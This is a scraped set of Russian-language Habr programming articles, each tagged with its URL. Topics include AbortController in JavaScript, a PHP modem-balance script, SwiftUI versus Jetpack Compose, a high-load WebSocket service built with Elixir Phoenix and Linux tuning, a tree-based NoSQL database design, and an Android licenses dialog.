// начальный запрос
const r = fetch('https://example.com/some-data', { signal })
}
doSomeComplexOperation() {
if (this.signal.aborted) {
// объект не может использоваться после остановки
throw new Error(`объект остановлен`)
}
for (let i = 0; i < 1_000_000; i += 1) {
// выполняем сложные вычисления
}
}
}
```
### Выполнение асинхронных операций в хуках `(P)react`
Хук [useEffect](https://ru.reactjs.org/docs/hooks-effect.html) часто используется для выполнения сетевых запросов. Однако проблема состоит в том, что предыдущий эффект может не успеть завершиться до начала следующего:
```
function SomeComponent({ someProp }) {
useEffect(() => {
fetch(url + someProp).then().catch().finally()
}, [someProp])
return <>
}
```
Вместо этого, предыдущий эффект можно прерывать с помощью `AbortController`:
```
function FooComponent({ someProp }) {
useEffect(() => {
const controller = new AbortController()
const { signal } = controller
;(async () => {
const r = await fetch(url + someProp, { signal })
// ...
})()
return () => controller.abort()
}, [someProp])
return <>
}
```
Эту логику можно инкапсулировать в кастомном хуке, например, `useEffectAsync`.
*Обратите внимание*: несмотря на то, что ключевое слово `await` приостанавливает выполнение асинхронного кода, состояние хука является стабильным. Другими словами, значения, используемые в хуке, остаются неизменяемыми на протяжении всего жизненного цикла хука:
```
function SomeComponent() {
const [v, setV] = useState(0)
useEffectAsync(async (signal) => {
await new Promise((r) => setTimeout(r, 1000))
// Какое значение будет иметь `v`?
// Значение этой переменной всегда будет равняться `0`,
// даже если в период задержки будет нажата кнопка
}, [])
return setV((v) => v + 1)}>Увеличить
}
```
Вспомогательные функции
-----------------------
`AbortSignal` предоставляет несколько вспомогательных функций.
*Обратите внимание*: не все эти функции могут быть доступны к моменту чтения данной статьи.
#### `AbortSignal.timeout(ms)`
Данная функция создает сигнал, который автоматически прерывается через указанный промежуток времени в мс. Этот функционал можно реализовать самостоятельно следующим образом:
```
function abortTimeout(ms) {
const controller = new AbortController()
const timerId = setTimeout(() => {
controller.abort()
clearTimeout(timerId)
}, ms)
return controller.signal
}
```
#### `AbortSignal.any(signals)`
Данная функция создает сигнал, который прерывается в случае прекращения любого из переданных ему сигналов. *Обратите внимание*: если не передать ни одного сигнала, производный сигнал никогда не будет прерван. Полифил:
```
function abortAny(signals) {
const controller = new AbortController()
signals.forEach((signal) => {
if (signal.aborted) {
controller.abort()
} else {
signal.addEventListener('abort', () => controller.abort(), { once: true })
}
})
return controller.signal
}
```
#### `AbortSignal.throwIfAborted()`
Данная функция просто выбрасывает исключение в случае прерывания сигнала:
```
if (signal.aborted) {
throw new Error(errMsg)
}
// альтернатива
signal.throwIfAborted()
```
Полифил может выглядеть так:
```
function throwIfSignalAborted(signal) {
if (signal.aborted) {
throw new Error(errMsg)
}
}
```
Пожалуй, это все, чем я хотел поделиться с вами в данной статье. Надеюсь, вы, как и я, узнали для себя что-то новое и не зря потратили время.
Благодарю за внимание и happy coding!
---
[](https://cloud.timeweb.com/vds-promo-10-rub?utm_source=habr&utm_medium=banner&utm_campaign=vds-promo-10-rub) | https://habr.com/ru/post/673048/ | null | ru | null |
# Проверка счета Киевстар модема в Linux
Навеяно [этим](http://habrahabr.ru/blogs/telecom/98782/) топиком. Однажды у меня случился переезд и на новом месте проживания и мне потребовался срочно интернет. Насмотревшись рекламы Киевстара модем за 199 грн, я приобрел данный набор. Настройка в Ubuntu через NetworkManager не потребовало никаких усилий. Но мне не хватало проверки денег на счету (не через браузер). Представляю вам скрипт, который мне помог это решить.
> `php<br/
>
>
> function decodePDU($in) {
>
> $b = 0; $d = 0;
>
> $out = "";
>
> foreach (str\_split($in, 2) as $ss) {
>
> $byte = hexdec($ss);
>
> $c = (($byte & ((1 << 7-$d)-1)) << $d) | $b;
>
> $b = $byte >> (7-$d);
>
> $out .= chr($c);
>
> $d++;
>
> if ($d == 7) {
>
> $out .= chr($b);
>
> $d = 0; $b = 0;
>
> }
>
> }
>
> return $out;
>
> }
>
>
>
> function encodePDU($in) {
>
> $out = "";
>
> for ($i = 0; $i < strlen($in); $i++) {
>
> $t = $i%8+1;
>
> if ($t == 8)
>
> continue;
>
> $c = ord($in[$i])>>($i%8);
>
> $oc = $c;
>
> $b = ord($in[$i+1]) & ((1 << $t)-1);
>
> $c = ($b << (8-$t)) | $c;
>
> $out .= strtoupper(str\_pad(dechex($c), 2, '0', STR\_PAD\_LEFT));
>
> }
>
> return $out;
>
> }
>
>
>
> if (!isset($argv) || !$argv[1]){
>
> die("Neet number of service. Sample:` | https://habr.com/ru/post/98837/ | null | ru | null |
# Гонка вооружений

В мае на Google I/O 2019 было объявлено о новом фреймворке для разработки декларативного UI под Android с названием Jetpack Compose. Через месяц на WWDC 2019 было объявлено о декларативном UI фреймворке под IOS с названием SwiftUI. После этих конференции стало понятно, к чему стремится мобильная разработка, и мне захотелось разобраться, что можно сделать с помощью этих фреймворков на данный момент и в чем разница между ними.
### Беглый обзор
После беглого обзора стало понятно о наличии крутой документации в IOS

и о полном отсутствии документации в android. Для ознакомления с фреймворком на официальной странице советуют посмотреть демо приложение.

### Hello World
Начать использовать SwiftUI очень просто, достаточно обновить macOS до beta версии, установить Xсode 11 Beta, и создать новый проект, при этом выбрав галочку “Use SwiftUI”.

В случае с Jetpack Compose все сложнее. Нам нужно скачать последнюю сборку с Jetpack. И на основе модуля ui-demos, методом тыка, разобраться, как работать c фраймворком и какие зависимости необходимы. Очень печальное первое впечатление от Compose по сравнению с SwiftUI.

**Пример Compose**
```
@Composable
fun HelloWorld() {
Text(text = "Hello world")
}
```
**Пример SwiftUI**
```
struct ContentView: View {
var body: some View {
Text("Hello SwiftUI!")
}
}
```
Верстка UI выглядит очень схоже, что логично, так как она стремится к декларативному виду.
### Визуальный редактор
Со SwiftUi поставляется визуальный редактор(canvas),
который:
— перерисовывeт экран моментально после изменения кода;

— умеет показывать сразу же несколько девайсов;

— дает возможность изменять атрибуты ui элементов из редактора;

— и самое интересное и крутое — можно запустить код ui из редактора и посмотреть, как работает экран.

В случае с Jetpack Compose никакого визуального редактора нет.
### Работа со списками
Для работы в SwiftUI просто создаем view строки
```
struct ListRow: View {
let number:Int
var body: some View {
Text.init(verbatim: "Text \(number)")
}
}
```
и вставляем в список.
```
List(Array(0...44)) { number in
ListRow.init(number: number)
}
```
Список готов.

В Compose пока нет виджета работающего со списками. На первый взгляд, можно воспользоваться Column.
```
Column {
listOf(
"Артем",
"Святослав",
"Женя",
"Никита",
"Алина",
"Леша",
"Вадим",
"Паша",
"Ваня"
)
.forEach { name ->
Text(text = name, style = +themeTextStyle { h2 })
}
}
```
Но он не скролящийся.

Что самое печальное, даже пример от Google не доработан и не скролится.

### Иерархия view
В SwiftUI корневым элементом на смену UIViewController становится новый компонент View с новым жизненным циклом. Это говорит о том, что Apple, проанализировав плюсы и минусы реализации UIViewController, попыталась сделать все по-новому, реализовав лучшие черты.
```
struct ContentView : View {
var body: some View {
Text("ContentView2 ")
.onDisappear(){
print("onDisappear")
}
.onAppear{
print("onAppear")
}
}
}
```
В случае же с Compose корневыми элементами остаются старый добрый Activity или Fragment, вместо привычной загрузки XML.
```
class MainActivity : Activity() {
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
}
}
```
Идет загрузка виджетов из Compose.
```
class ComposeActivity : Activity() {
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContent {
CraneWrapper {
MaterialTheme {
Text(text = "Hello world")
}
}
}
}
}
```
Это ведет к тому, что в Android не избавляются от легаси корневых вьюх. Просто старыe UI компоненты теперь общаются не с XML, а с Compose виджетами.
### Навигация
Для навигации в SwiftUI необходимо указать, какая view должна открываться по нажатию на кнопку.
```
NavigationButton(destination: LandmarkDetail()) {
LandmarkRow(landmark: landmark)
}
```
Внутри Compose реализации навигации нет. Но наверное она и не должна быть, так как корневым элементом являeтся Activity или Fragment, в которых уже давным давно ~~накостылена~~ реализована навигация.
### Поддерживаемая версия
SwiftUI работает с IOS 13, выходящей в сентябре, которая уже не будет поддерживаться на iPhone 5S, iPhone6, iPhone 6 Plus. Разработчикам стоит задуматься, насколько они будут готовы отказаться от этих моделей.
Compose планирует поддерживаться на любой версии Android.
### Заключения
После конференций я думал, что появилось два новых мощных фреймворка для ui. В итоге получилось, что Apple сделал крутое решение, от которого у многих “состояние экзальтации”. А Google анонсировала фреймворк, который настолько сырой, что не понятно, как будут работать многие моменты даже на уровне концепций. | https://habr.com/ru/post/456770/ | null | ru | null |
# Разработка высоконагруженного WebSocket-сервиса
Как создать веб-сервис, который будет взаимодействовать с пользователями в реальном времени, поддерживая при этом несколько сотен тысяч коннектов одновременно?
Всем привет, меня зовут Андрей Клюев, я разработчик. Недавно я столкнулся с такой задачей – создать интерактивный сервис, где пользователь может получать быстрые бонусы за свои действия. Дело осложнялось тем, что в проекте были довольно высокие требования по нагрузке, а сроки были крайне невелики.
В этой статье я расскажу, как выбирал решение для реализации websocket-сервера под непростые требования проекта, с какими проблемами столкнулся в процессе разработки, а также скажу несколько слов о том, как в достижении вышеуказанных целей может помочь конфигурирование ядра Linux.
В конце статьи приведены полезные ссылки на инструменты разработки, тестирования и мониторинга.
Задачи и требования
-------------------
### Требования к функционалу проекта:
* сделать возможным отслеживание присутствия пользователя на ресурсе и трекинг времени просмотра;
* обеспечить быстрый обмен сообщениями между клиентом и сервером, так как время на получение пользователем бонуса строго ограничено;
* создать динамичный интерактивный интерфейс с синхронизацией всех действий при работе пользователя с сервисом через несколько вкладок или устройств одновременно.
### Требования к нагрузке:
* Приложение должно выдерживать не менее 150 тысяч пользователей онлайн.
Срок реализации – 1 месяц.
Выбор технологии
----------------
Сопоставив задачи и требования проекта, я пришел к выводу, что для его разработки целесообразнее всего использовать технологию WebSocket. Она обеспечивает постоянное соединение с сервером, избавляя от оверхеда на новое соединение при каждом сообщении, которое присутствует в реализации на технологиях ajax и long-polling. Это позволяет получить необходимую высокую скорость обмена сообщениями в сочетании с адекватным потреблением ресурсов, что очень важно при высоких нагрузках.
Также благодаря тому, что установка и разрыв соединения – это два четких события, появляется возможность с высокой точностью отслеживать время присутствия пользователя на сайте.
Учитывая достаточно ограниченные сроки проекта, я принял решение вести разработку с помощью WebSocket-фреймворка. Изучил несколько вариантов, самыми интересными из которых мне показались PHP ReactPHP, PHP Ratchet, Node.JS websockets/ws, PHP Swoole, PHP Workerman, Go Gorilla, Elixir Phoenix. Их возможности в плане нагрузки тестировал на ноутбуке с процессором Intel Core i5 и 4 ГБ оперативной памяти (таких ресурсов было вполне достаточно для исследования).
**PHP Workerman** – асинхронный событийно-ориентированный фреймворк. Его возможности исчерпываются простейшей реализацией websocket-сервера и умением работать с библиотекой libevent, нужной для обработки асинхронных оповещений о событиях. Код находится на уровне PHP 5.3 и не соответствует никаким стандартам. Для меня главным минусом стало то, что фреймворк не позволяет реализовывать высоконагруженные проекты. На тестовом стенде разработанное приложение уровня «Hello World» не смогло удержать и тысячи коннектов.
**ReactPHP** и **Ratchet** по своим возможностям в целом сопоставимы с Workerman. Ratchet внутри зависит от ReactPHP, работает также через libevent и не позволяет создать решение для высоких нагрузок.
**Swoole** – интересный фреймворк, написанный на C, подключается как расширение для PHP, имеет средства для параллельного программирования. К сожалению, я обнаружил, что фреймворк недостаточно стабилен: на тестовом стенде он обрывал каждый второй коннект.
Далее я рассмотрел **Node.JS WS**. Этот фреймворк показал неплохие результаты – около 5 тысяч коннектов на тестовом стенде без дополнительных настроек. Однако мой проект подразумевал заметно более высокие нагрузки, поэтому я остановил свой выбор на фреймворках Go Gorilla + Echo Framework и Elixir Phoenix. Эти варианты тестировались уже более детально.
Нагрузочное тестирование
------------------------
Для тестирования использовались такие инструменты как artillery, gatling и сервис flood.io.
Целью тестирования было изучение потребления ресурсов процессора и памяти. Характеристики машины были такими же – процессор Intel iCore 5 и 4 ГБ оперативной памяти. Тесты проводились на примере простейших чатов на Go и Phoenix:
Вот такое простое приложение чата нормально функционировало на машине указанной мощности при нагрузке 25-30 тысяч пользователей:
```
config:
target: "ws://127.0.0.1:8080/ws"
phases
-
duration:6
arrivalCount: 10000
ws:
rejectUnauthorized: false
scenarios:
-
engine: “ws”
flow
-
send “hello”
-
think 2
-
send “world”
```
```
Class LoadSimulation extends Simulation {
val users = Integer.getInteger (“threads”, 30000)
val rampup = java.lang.Long.getLong (“rampup”, 30L)
val duration = java.lang.Long.getLong (“duration”, 1200L)
val httpConf = http
.wsBaseURL(“ws://8.8.8.8/socket”)
val scn = scenario(“WebSocket”)
.exes(ws(“Connect WS”).open(“/websocket?vsn=2.0.0”))
.exes(
ws(“Auth”)
sendText(“““[“1”, “1”, “my:channel”, “php_join”, {}]”””)
)
.forever() {
exes(
ws(“Heartbeat”).sendText(“““[null, “2”, “phoenix”, “heartbeat”, {}]”””)
)
.pause(30)
}
.exes(ws(“Close WS”).close)
setUp(scn.inject(rampUsers(users) over (rampup seconds)))
.maxDuration(duration)
.protocols(httpConf)
```
Тестовые запуски показали, что все спокойно работает на машине указанной мощности при нагрузке 25-30 тысяч пользователей.
Потребление ресурсов процессора:
**Phoenix**

**Gorilla**

Потребление оперативной памяти при нагрузке в 20 тысяч соединений доходило до 2 ГБ в случае с обоими фреймворками:
**Phoenix**

**Gorilla**

При этом Go даже опережает Elixir по производительности, однако Phoenix Framework при этом предоставляет намного больше возможностей. На графике ниже, который показывает потребление сетевых ресурсов, можно заметить, что в тесте Phoenix передается в 1,5 раза больше сообщений. Это связано с тем, что у этого фреймворка уже в изначальной «коробочной» версии есть механизм heartbeat’ов (периодических синхронизирующих сигналов), который в Gorilla придется реализовывать самостоятельно. В условиях ограниченных сроков любая дополнительная работа была весомым аргументом в пользу Phoenix.
**Phoenix**

**Gorilla**

О Phoenix Framework
-------------------
Phoenix – это классический MVC-фреймворк, достаточно похожий на Rails, что не удивительно, так как одним из его разработчиков и создателем языка Elixir является Хосе Валим – один из основных создателей Ruby on Rails. Некоторое сходство можно увидеть даже в синтаксисе.
**Phoenix**:
```
defmodule Benchmarker.Router do
use Phoenix.Router
alias Benchmarker.Controllers
get "/:title", Controllers.Pages, :index, as: :page
end
```
**Rails:**
```
Benchmarker::Application.routes.draw do
root to: "pages#index"
get "/:title", to: "pages#index", as: :page
end
```
Mix – автоматизирующая утилита для Elixir-проектов
--------------------------------------------------
При использовании Phoenix и языка Elixir значительная часть процессов выполняется посредством утилиты Mix. Это инструмент для сборки (build tool), который решает множество разных задач по созданию, компиляции и тестированию приложения, по управлению его зависимостями и по некоторым другим процессам.
Mix – ключевая часть любого Elixir-проекта. Эта утилита ничем не уступает и ничем не превосходит аналоги из других языков, но справляется со своей работой на отлично. А благодаря тому, что Elixir-код выполняется на виртуальной машине Erlang, появляется возможность добавлять в зависимости любые библиотеки из мира Erlang. Помимо этого вместе с Erlang VM вы получаете удобный и безопасный параллелизм, а также высокую отказоустойчивость.
Проблемы и решения
------------------
При всех достоинствах у Phoenix есть и свои недостатки. Один из них заключается в сложности решения такой задачи, как отслеживание активных пользователей на сайте в условиях высокой нагрузки.
Дело в том, что пользователи могут подключаться к разным нодам приложения, и каждая нода будет знать лишь о собственных клиентах. Чтобы вывести список активных пользователей, придется опрашивать все ноды приложения.
Для решения этих проблем в Phoenix’е существует модуль Presence, который дает разработчику возможность отслеживать активных пользователей буквально в три строки кода. Он использует механизм хартбитов и бесконфликтной репликации внутри кластера, а также PubSub-сервер для обмена сообщениями между нодами.

Звучит хорошо, но на деле получается примерно следующее. Сотни тысяч подключающихся и отключающихся пользователей порождают миллионы сообщений на синхронизацию между нодами, из-за чего потребление ресурсов процессора переходит все допустимые пределы, и даже подключение Redis PubSub не спасает ситуацию. Список пользователей дублируется на каждой ноде, и расчет дифа при каждом новом подключении становится все дороже и дороже – и это учитывая, что расчет проводится на каждой из действующих нод.

В такой ситуации отметка даже в 100 тысяч клиентов становится недостижимой. Других готовых решений для данной задачи найти не удалось, поэтому я решил поступить следующим образом: возложить обязанность по мониторингу присутствия пользователей онлайн на БД.
На первый взгляд, это хорошая идея, в которой нет ничего сложного: достаточно хранить в базе поле last activity и периодически его обновлять. К сожалению, для проектов с высокой нагрузкой это не выход: когда количество пользователей достигнет нескольких сотен тысяч, система не справится с миллионами приходящих от них хартбитов.
Я выбрал менее тривиальное, но более производительное решение. При подключении пользователя для него создается уникальная строка в таблице, которая хранит в себе его идентификатор, точное время входа и список нод, к которым он подключен. Перечень нод хранится в JSONB-поле, и при конфликте строк достаточно его обновить.
```
create table watching_times (
id serial not null constraint watching_times_pkey primary key,
user_id integer,
join_at timestamp,
terminate_at timestamp,
nodes jsonb
);
create unique index watching_times_not_null_uni_idx
on watching_times (user_id, terminate_at)
where (terminate_at IS NOT NULL);
create unique index watching_times_null_uni_idx
on watching_times (user_id)
where (terminate_at IS NULL);
```
Вот такой запрос отвечает за вход пользователя:
```
INSERT INTO watching_times (
user_id,
join_at,
terminate_at,
nodes
)
VALUES (1, NOW(), NULL, '{nl@192.168.1.101”: 1}')
ON CONFLICT (user_id)
WHERE terminate_at IS NULL
DO UPDATE SET nodes = watching_times.nodes ||
CONCAT(
'{nl@192.168.1.101:',
COALESCE(watching_times.nodes->>'nl@192.168.1.101', '0')::int + 1,
'}'
)::JSONB
RETURNING id;
```
Список нод при этом выглядит так:

Если пользователь открывает сервис во втором окне или на другом устройстве, он может попасть на другую ноду, и тогда она тоже добавится в список. Если он попадет на ту же ноду, что и в первом окне, число напротив названия этой ноды в списке увеличится. Это число отражает количество активных подключений пользователя к конкретной ноде.
Вот так выглядит запрос, который идет в БД при закрытии сессии:
```
UPDATE watching_times
SET nodes
CASE WHEN
(
CONCAT(
'{“nl@192.168.1.101”: ',
COALESCE(watching_times.nodes ->> 'nl@192.168.1.101', '0') :: INT - 1,
'}'
)::JSONB ->>'nl@192.168.1.101'
)::INT <= 0
THEN
(watching_times.nodes - 'nl@192.168.1.101')
ELSE
CONCAT(
'{“nl@192.168.1.101”: ',
COALESCE(watching_times.nodes ->> 'nl@192.168.1.101', '0') :: INT - 1,
'}'
)::JSONB
END
),
terminate_at = (CASE WHEN ... = '{}' :: JSONB THEN NOW() ELSE NULL END)
WHERE id = 1;
```
Список нод:

При закрытии сессии на определенной ноде счетчик подключений в БД уменьшается на единицу, а при достижении нуля нода убирается из списка. Когда список нод окончательно опустеет, этот момент будет зафиксирован как окончательное время выхода пользователя.
Данный подход дал возможность не только отслеживать присутствие пользователя онлайн и время просмотра, но и фильтровать эти сессии по различным критериям.
Во всем этом остается лишь один недостаток – если нода падает, все ее пользователи «зависают» в онлайне. Для решения данной проблемы у нас есть демон, который периодически чистит БД от таких записей, но до сих пор этого не требовалось. Анализ нагрузки и мониторинг работы кластера, проведенные после выхода проекта в продакшн, показали, что падений нод не было и данный механизм не использовался.
Были и другие трудности, но они более специфичны, поэтому стоит перейти к вопросу отказоустойчивости приложения.
Конфигурирование ядра Linux для повышения производительности
------------------------------------------------------------
Написать хорошее приложение на производительном языке – это только половина дела, без грамотных DevOps достигнуть хоть сколько-нибудь высоких результатов невозможно.
Первой преградой на пути к целевой нагрузке стало сетевое ядро Linux. Потребовалось произвести некоторые настройки, чтобы добиться более рационального использования его ресурсов.
Каждый открытый сокет – это файловый дескриптор в Linux, а их число ограничено. Причина лимита в том, что для каждого открытого файла в ядре создается C-структура, которая занимает unreclaimable-память ядра.
Чтобы использовать память по максимуму, я выставил очень высокие значения размеров буферов приема и передачи, а также увеличил размер буферов TСP сокетов. Значения здесь выставляются не в байтах, а в страницах памяти, обычно одна страница равна 4 кБ, и на максимальное количество открытых сокетов, ожидающих соединения для высоконагруженных серверов, я поставил значение 15 тысяч.
### Лимиты файловых дескрипторов:
```
#!/usr/bin/env bash
sysctl -w 'fs.nr_open=10000000' # Максимальное количество открытых файловых дескрипторов
sysctl -w 'net.core.rmem_max=12582912' # Максимальный размер буферов приема всех типов
sysctl -w 'net.core.wmem_max=12582912' # Максимальный размер буферов передачи всех типов
sysctl -w 'net.ipv4.tcp_mem=10240 87380 12582912' # Объем памяти TCP сокета
sysctl -w 'net.ipv4.tcp_rmem=10240 87380 12582912' # размер буфера приема
sysctl -w 'net.ipv4.tcp_wmem=10240 87380 12582912'# размер буфера передачи
`sysctl -w 'net.core.somaxconn=15000' # Максимальное число открытых сокетов, ждущих соединения`
```
Если вы используете nginx перед cowboy-сервером, то стоит также задуматься об увеличении его лимитов. За это отвечают директивы worker\_connections и worker\_rlimit\_nofile.
Вторая преграда не столь очевидна. Если запустить подобное приложение в распределенном режиме, можно заметить резкий рост потребления ресурсов процессора при увеличении количества коннектов. Проблема в том, что Erlang по умолчанию работает с системными вызовами Poll. В версии 2.6 ядра Linux существует Epoll, который может предоставить более эффективный механизм для приложений, обрабатывающих большое количество одновременно открытых соединений — со сложностью O(1) в отличие от Poll, обладающего сложностью O(n).
К счастью, режим Epoll включается одним флагом: +K true, также рекомендую увеличить максимальное количество процессов, порождаемых вашим приложением, и максимальное количество открытых портов с помощью флагов +P и +Q соответственно.
### Poll vs. Epoll
```
#!/usr/bin/env bash
Elixir --name ${MIX_NODE_NAME}@${MIX_HOST} --erl “-config sys.config -setcookie ${ERL_MAGIC_COOKIE} +K true +Q 500000 +P 4194304” -S mix phx.server
```
Третья проблема более индивидуальна, и не каждый может с ней столкнуться. На данном проекте был организован процесс автоматического деплоя и динамического скейлинга с помощью Сhef и Kubernetes. Kubernetes позволяет быстро разворачивать Docker-контейнеры на большом количестве хостов, и это очень удобно, однако заранее узнать ip-адрес нового хоста нельзя, а если не прописать его в конфиг Erlang, подключить новую ноду к распределенному приложению не получится.
К счастью, для решения этих проблем существует библиотека libcluster. Общаясь с Kubernetes по API, она в режиме реального времени узнает о создании новых нод и регистрирует их в кластере erlang.
```
config :libcluster,
topologies: [
k8s: [
strategy: Cluster.Strategy.Kubernetes,
config: [
kubernetes_selector: “app=my -backend”,
kubernetes_node_basename: “my -backend”]]]
```
Итоги и перспективы
-------------------
Выбранный фреймворк в сочетании с правильной настройкой серверов позволил достичь всех целей проекта: в поставленные сроки (1 месяц) разработать интерактивный веб-сервис, который общается с пользователями в режиме реального времени и при этом выдерживает нагрузки от 150 тысяч коннектов и выше.
После запуска проекта в продакшн был проведен мониторинг, который показал следующие результаты: при максимальном количестве коннектов до 800 тысяч потребление ресурсов процессора доходит до 45%. Среднее значение загрузки составляет 29% при 600 тысячах соединений.

На этом графике – потребление памяти при работе в кластере 10 машин, каждая из которых имеет по 8 ГБ оперативной памяти.


Что же касается основных рабочих инструментов в этом проекте, Elixir и Phoenix Framework, у меня есть все основания полагать, что в ближайшие годы они станут такими же популярными, как в свое время Ruby и Rails, так что есть смысл начинать их освоение уже сейчас.
Спасибо за внимание!
Ссылки
------
**Разработка:**
[elixir-lang.org](https://elixir-lang.org/)
[phoenixframework.org](http://phoenixframework.org/)
**Нагрузочное тестирование:**
[gatling.io](https://gatling.io/)
[flood.io](https://flood.io/)
**Мониторинг:**
[prometheus.io](https://prometheus.io/)
[grafana.com](https://grafana.com/) | https://habr.com/ru/post/351012/ | null | ru | null |
# еще один велосипед или TreeDb — NoSQL Database startup
Хочу представить старт проекта, с рабочим названием TreeDb. Я не пиарюсь (еще далеко...) и размещаю свои мысли и рассуждения в личном блоге. Хочу в ответ получить адекватную критику, обсуждение идей, в общем все то, для чего нужны блоги ;). Просто, в последствии интересно проследить историю проекта, что задумали и что на выходе. А может кто и захочет и по участвовать. Всегда рады.
Из названия понятно, что речь пойдет о БД, основанной на деревьях. Сразу оговорюсь — на данный момент нет ни строчки кода. Сперва определюсь с концепцией.
ниже FAQ
немного о терминологии:
**Ключ** — уникальный идентификатор, однозначно определяющий некоторые (конкретные) данные.
ключ может содержать символы \w [azAZ09\_] \*
\* — возможно это ограничение в будущем будет снято или расширенно на [ая]. Просьба к этому пока не придираться.
Ключ может быть полным или коротким.
**Короткий ключ** — это имя ноды, уникальное в пределах данного уровня. А если выразиться точнее — в составе одной Родительской ноды должны быть только уникальные имена дочерних нод (В одной большой семье нет одинаковых имен у братьев и сестер). Пример простого ключа A1, B2, C3
Полный ключ — это последовательно сконтектанированные через точку имена всех родительских нод.
Пример полного ключа A1.B2.C3 — имя Ноды C3, ее родителя B2, и пра-родителя A1
**Данные** — определенная последовательность байт, которую необходимо запомнить и выдать по запросу. данные могут быть как алфавитно-цифровые, так и бинарные.
**Нода** (узел ) — однозначно определяемая ключом совокупность данных и дочерних нод. другими словами Нода — содержит имя (ключ), данные и ссылки на дочерние ноды.
Дочерняя нода — нода, содержащаяся в Родительской ноде и имеющая одну связь. Масло масленное.
Дочерняя нода может быть неименованной, т.е цифровой ключ присваевается ей автоматически в порядке поступления. см пример…
Корневая нода — практически ее нет, есть ноды первого уровня. Теоретически — должна существовать.
###### Описание Протокола обмена
За основу взят Протокол обмена memcached. В первое время планируется реализовать только две команды: get & set
1) Записать ноду A1
``set A1, \r\n
\r\n
>stored или error \*
\*- может заменить на Ok или $
Пример:
set A1,5
12345
>stored`
2) Записать несколько нод
``set (,)+ \r\n
\r\n
>stored
....
\r\n
>stored\*
\*- может сделать только одно подтверждение на весь блок данных?
Пример:
set A1,5 A2,5 A3,5
12345
>stored
67890
>stored
abcde
>stored`
3) извлечь ноду A1
g`et A1\r\n
>A1 5
>12345\r\n
>ok *
*- нужнен ли окей? (optional)`
4) извлечь ноды A1,A2,A3
g`et A1,A2,A3\r\n
>A1 5
>12345\r\n
>A2 5
67890
>A2 5
abcde
>ok *
*- нужнен ли окей?`
5) записать в ноду A группу неименованных нод (может обозвать рекордсетом?)
set A.# 5,5,5
12345
>stored
67890
>stored
abcde
>stored
Если дочерних нод в ноде А не было, то появятся ноды с именами: #1,#2,#3
если эти уже были, то появятся следующие имена: #4,#5,#6
6) просмотреть в ноде A список дочерних нод
`get A.#
> A.#1,A.#2,A.#3
>ok`
7) просмотреть в ноде A данные дочерних нод
`get A.*
>A.#1 5
>12345\r\n
>A.#2 5
>67890\r\n
>A.#3 5
>abcde
>ok`
8) добавить в ноду A группу нод
*- данный пункт под вопросом
`set A: B1,5 B2,5 B3,5
12345
>stored
67890
>stored
abcde
>stored`
это равнозначно:
set A.B1,5 A.B2,5 A.B3,5
Пока не допустим шаблон a.*.b.*,
но допустим a.с.b.* и a.с.*.*
Версия первая, будет урезаться и дополняться.
##### FAQ
*почему изобретаем велосипед?*
да, скучно стало... надо освоить новые технологии.
*какова предполагаемая нагрузка?*
да, как получится...
где-то на уровне быстродействия редиса.
главное чтоб быстрее мускуля,
иначе нет смысла заморачиваться.
*а как предполагаете хранить данные?*
по аналогии с редисом, данные сохраняются на диск в бедграуне, без потери быстродействия.
объем данных должен вмещаться в оперативную память.
концепция хранения продумывается.
*какую архитектуру сервера предполагаете использовать?*
пока остановился на мультитредовой. Но, может будут и иные предложения.
надо почитать доку по libevent
*ну, а как собираете хранить ноды?*
буду выделять пул памяти большими кусками и размещать ноды в нем.
каждая нода будет представлена структурой. Один пул под Массив нод, один пул под каталоги ключей.
*Собираетесь использовать индексы?*
пока не вижу смысла. Как такового - у меня полнотекстного поиска нет и не планируется,
моя модель больше похожа на key-value БД.
поиск будет происходить по дереву каталогов, и после нахождения необходимых нод - будет формироваться вывод.
*глубина ключа ограничена*?
думаю пока сделать ограничения - 32 уровня.
*а длинна простого ключа?*
32 символа - думаю хватит... а может 16?
*В Протоколе отсутствуют операции удаления?*
Удалить не сложно, былоб что удалять. Конечно добавим удаление, сперва надо хоть что-то реализовать!
*а как на счет UPDATE?*
ну ее заменяет простой set
*а какие клиенты будут поддерживаться?*
был бы продукт, а как написать клиента, всегда найдутся желающие.
лично я, как РНРник - напишу клиента для РНР.
*а когда мы увидим продукт?*
ну, так сложно сказать... все зависит от моего свободного времени...
думаю к концу лета что-то должно быть.`` | https://habr.com/ru/post/80928/ | null | ru | null |
# Реализация списка использованных библиотек с помощью DialogFragment в Android приложении
Часто при реализации мобильного приложения для Android c использованием в нем различных сторонних библиотек требуется их упомянуть в своем проекте, чтоб не нарушать права 3-х лиц и не попасть в бан с вашим проектом в магазине приложений Google Play.
В приложение нам нужно поместить описание использованных библиотек и указать их лицензию.
Речь идет о библиотеках, которые находятся на [GitHub](https://github.com).
Описание лицензий находится в дереве проекта в файле README.md. По данной ссылке, можно посмотреть на описание лицензии библиотеки [Picasso](https://github.com/square/picasso/blob/master/README.md) (нужно пролистать в самый низ).
Итак, это требование реализуется с помощью DialogFragment, можно его реализовать и при помощи AlertDialog (именно Fragment использовать лучше, так как он сохраняет свое состояние при перевороте девайса). Поместить данную фичу рекомендуется либо в Navigation Drawer, либо в Overflow.
Чтобы было понятно, о чем идет речь, вот как это выглядит у одного весьма популярного приложения:

**Реализация:**
1.
Нужно создать папку assets в корне каталога app (правой кнопкой кликаем на app > new > folder > assets folder и нажимаем finish ничего не меняя), где поместить наш .html файл с описанием библиотек и лицензий, которые мы используем.
Правой кнопкой кликаем на assets > new > file > name.html
Я файл назвал: open\_source\_licenses.html
Содержимое файла open\_source\_licenses.html:
```
body {
font-family: sans-serif;
}
pre {
background-color: #eeeeee;
padding: 1em;
white-space: pre-wrap;
}
###
Apache License
Version 2.0, January 2004
* **Picasso**
Copyright 2013 Square, Inc.
```
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
```
```
2.
Создаем в папке layout файл в который просто поместим только WebView и назовем его — dialog\_license.xml:
```
xml version="1.0" encoding="utf-8"?
```
3.
Создаем новый java класс и называем его, например — LicensesDialogFragment.java и помещаем в этот класс такой код:
```
public class LicensesDialogFragment extends DialogFragment {
public static LicensesDialogFragment newInstance() {
